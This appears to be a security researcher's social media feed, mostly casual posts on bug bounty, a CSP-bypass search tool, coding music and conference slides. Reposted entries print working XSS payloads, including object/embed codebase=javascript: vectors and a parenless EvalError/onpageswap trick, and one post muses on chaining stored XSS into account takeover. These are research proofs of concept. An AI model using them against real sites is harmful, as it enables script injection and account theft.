Lightnews — Scholar-powered news

Reposted by renniepak

Gareth Heyes @garethheyes.co.uk · 20d

In a shameless effort to promote my book. I've crafted some very special vectors for you. If you like them please purchase my book to read more.

www.amazon.com/dp/B0BRD9B3GS

3 13

renniepak @renniepak.nl · Sep 6

I was unaware of coding music to begin with. So I guess I'll check out sonicpi as well. :)

1

renniepak @renniepak.nl · Sep 6

Been playing around with strudel.cc recently. It is pretty awesome!

strudel.cc#Ly9Td2VldCBE...

Strudel REPL

Strudel is a music live coding environment for the browser, porting the TidalCycles pattern language to JavaScript.

strudel.cc

1 1

Reposted by renniepak

Marko Bevc @marko.social · Sep 2

Great interview with @racheltobac.bsky.social shining a light in a lot of important topics, like what are likely attack vectors, impact of #AI on #security, #ethics, affecting social interactions and #privacy .

"Be politely paranoid." 👏

www.youtube.com/watch?v=xEdZ...

Social Engineer: YOU are Easier to Hack than your Computer

YouTube video by Scammer Payback

www.youtube.com

3 6 12

renniepak @renniepak.nl · Aug 27

Coded some PHP today without using ChatGPT, like a mad man.

6

Reposted by renniepak

0xacb @0xacb.com · Aug 26

Time to reveal what I was doing with @teknogeek.io back in '19.

All the hard work and sleepless nights have paid off!

3 13

renniepak @renniepak.nl · Aug 25

Just finished a major UI overhaul of CSPBypass.com and would love your feedback. Excited to welcome ProjectDiscovery as our first sponsor. Huge thanks to their team for supporting the project and recognizing its value to the community.

CSP Bypass Search

A tool designed to help ethical hackers bypass restrictive Content Security Policies

CSPBypass.com

3

renniepak @renniepak.nl · Aug 24

I enabled sponsorships on Github for cspbypass.com.

The main goal is to cover hosting fees etc. So if you want to support my work, I would highly appreciate it if you could become a sponsor.

github.com/sponsors/ren...

Thanks!

CSP Bypass Search

A tool designed to help ethical hackers bypass restrictive Content Security Policies

cspbypass.com

1 2

renniepak @renniepak.nl · Aug 21

Forgot how to bug bounty.

1 1 2

renniepak @renniepak.nl · Jul 17

LOL. almost 3 years after reporting it and it being fixed, I got assigned a CVE for a vuln I found 🙃

nvd.nist.gov/vuln/detail/...

NVD - CVE-2025-53836

nvd.nist.gov

1 6

renniepak @renniepak.nl · Jun 26

That's awesome! Congrats!

3

Reposted by renniepak

Gareth Heyes @garethheyes.co.uk · Jun 20

Made hacking rooms work in real time. This demo connects three browsers with real time editing on. From Chrome I edit some HTML. This gets sent over websockets to the other browsers which call postMessage to a blob with a sandboxed iframe.

3 4

renniepak @renniepak.nl · Jun 19

😍

8

renniepak @renniepak.nl · Jun 14

I have no clue any more. I have stored XSS on a specific subdomain, I have another subdomain that reflects all cookies (also http only), I can register my own OAuth clients somewhere else. But uh, I dunno. Stuff.

renniepak @renniepak.nl · Jun 12

I feel like I have all the pieces to a ATO chain. I just have no idea what the chain would be...

1 4

renniepak @renniepak.nl · Jun 11

I thought he would. That dude is awesome.

1

renniepak @renniepak.nl · Jun 10

I think @mrtuxracer.bsky.social already does this kind of stuff as part of his bug bounty. Not cloud though.

1 1

renniepak @renniepak.nl · Jun 10

No, the conference took place quite a while ago. This is my website, and the slides will remain available here.

Reposted by renniepak

Gareth Heyes @garethheyes.co.uk · Jun 9

Epic Firefox XSS vectors by Masato Kinugawa. Now available on our XSS cheat sheet including variants found by me.

Link to vectors👇
portswigger.net/web-security...

<object data=# codebase=javascript:alert(document.domain)//>
<embed src=# codebase=javascript:alert(document.domain)//>
<object data="#
alert(1)" codebase=javascript://>
<embed src="#!
alert(1)" codebase=javascript:>

4 11

renniepak @renniepak.nl · Jun 7

🏳️‍🌈

4

renniepak @renniepak.nl · Jun 6

What are the benefits?

1

renniepak @renniepak.nl · Jun 6

You can checkout all the slides/examples here:
0-a.nl/nahamcon/

I don't have a blog (about WAF bypasses).

Widgets Gone Wild - Title Slide

0-a.nl

1 1

renniepak @renniepak.nl · Jun 5

K-9 = Canine.

🤯

3

renniepak @renniepak.nl · Jun 4

100%!

2

Reposted by renniepak

Gareth Heyes @garethheyes.co.uk · Jun 4

Abuse EvalError, onpageswap, and setTimeout to get JS execution without parens.
@0x999.net redirects the page to trigger onpageswap, hijacks the thrown error, and turns it into code. Inspired by @terjanq.me. Now available on the XSS cheat sheet.

Link to vector👇
portswigger.net/web-security...

$<script> onpageswap=setTimeout; location='x'; Event.prototype.toString=EvalError.prototype.toString; Event.prototype.name='alert\x281\x29' </script>$

4 13